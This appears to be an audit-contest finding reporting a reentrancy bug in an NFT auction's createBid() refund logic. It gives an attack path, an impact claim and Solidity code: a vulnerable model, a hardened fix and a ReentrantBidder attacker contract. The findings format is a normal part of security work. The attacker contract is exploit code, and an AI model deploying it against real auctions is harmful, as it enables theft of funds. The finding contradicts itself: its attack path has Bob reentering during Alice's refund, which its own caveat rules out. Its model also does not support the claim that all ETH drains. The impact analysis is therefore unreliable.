Interesting Mulberry Eagle
High
The createBid() function in the contract updates the auction state (bidder, amount) only after transferring ETH to the last bidder. This allows me to reenter the contract during the external call _safeTransferETHWithFallback(lastBidder, _auction.amount), which executes before the state update, and so to receive the refund repeatedly.
No response
No response
No response
- Bob (the attacker) places a bid in an auction for a Noun.
- Bob waits until the auction is near expiration, preparing to place a higher bid.
- Bob places the new bid, which calls createBid; the contract attempts to refund the last bidder, Alice.
- The refund is sent to Alice before the auction state (specifically the bidder and amount variables) is updated.
- Bob exploits this by calling createBid again during the refund, causing the contract to issue the refund repeatedly and draining ETH from the contract.
Bob can repeatedly drain ETH from the contract by exploiting this reentrancy. Each reentrant call pays out Alice's last bid amount again, and by triggering it enough times he can deplete the contract's balance. This results in all the ETH being drained from the contract.
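The ordering problem described above, reduced to a minimal model. This is an added example written for this report, not the project's contract: VulnerableAuction, HardenedAuction, ReentrantBidder, MIN_INCREMENT and the plain call-based refund are assumptions standing in for the real auction house and its _safeTransferETHWithFallback helper. The vulnerable contract performs the refund (interaction) before writing bidder and amount (effects), so the refunded contract's receive() can call createBid again while the stale values are still in storage; the hardened contract writes state first and adds a reentrancy guard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical stand-in for the auction house (not the project's code).
// Refunds the previous bidder BEFORE recording the new bid.
contract VulnerableAuction {
    address public bidder;
    uint256 public amount;
    uint256 public constant MIN_INCREMENT = 1 ether; // assumed bid step

    function createBid() external payable {
        address lastBidder = bidder;
        uint256 lastAmount = amount;
        require(msg.value >= lastAmount + MIN_INCREMENT, "bid too low");

        // Interaction before effects: while this call runs, bidder/amount
        // still hold the OLD values, so a reentrant createBid sees a stale
        // auction and issues the same refund again.
        if (lastBidder != address(0)) {
            (bool ok, ) = lastBidder.call{value: lastAmount}("");
            require(ok, "refund failed");
        }

        bidder = msg.sender; // effects only happen after the external call
        amount = msg.value;
    }
}

// Same auction with checks-effects-interactions and a reentrancy guard.
contract HardenedAuction {
    address public bidder;
    uint256 public amount;
    uint256 public constant MIN_INCREMENT = 1 ether;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function createBid() external payable nonReentrant {
        address lastBidder = bidder;
        uint256 lastAmount = amount;
        require(msg.value >= lastAmount + MIN_INCREMENT, "bid too low");

        // Effects first: storage already reflects the new bid before any
        // ETH leaves the contract.
        bidder = msg.sender;
        amount = msg.value;

        // Interaction last: a nested createBid would now see the new
        // bidder/amount, and the guard rejects it anyway.
        if (lastBidder != address(0)) {
            (bool ok, ) = lastBidder.call{value: lastAmount}("");
            require(ok, "refund failed");
        }
    }
}

// Attacker contract (hypothetical). Deploy with ETH, call attack() once to
// become the current bidder, then call attack() again with a higher value:
// the refund of the first bid lands in receive(), which re-bids while the
// auction still believes the old bid is current.
contract ReentrantBidder {
    VulnerableAuction public immutable target;
    uint256 public refundsReceived;
    uint256 public constant LOOPS = 3; // how many nested refunds to trigger

    constructor(VulnerableAuction _target) payable {
        target = _target;
    }

    function attack() external payable {
        target.createBid{value: msg.value}();
    }

    receive() external payable {
        refundsReceived++;
        if (refundsReceived < LOOPS) {
            // amount() is still the stale value during the refund call.
            uint256 next = target.amount() + target.MIN_INCREMENT();
            target.createBid{value: next}();
        }
    }
}
```

Two things to check against the real contract before relying on this model: first, the refund must actually reach an attacker-controlled contract (the reentrant call comes from the refunded address, so the attacker has to be the previous highest bidder, not a third party); second, the actual refund helper must forward enough gas for the nested createBid to execute, which the plain `call{value: ...}("")` above does but a gas-capped transfer may not. The fix is the same either way: write bidder and amount before the external call and guard createBid against reentry.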
No response
No response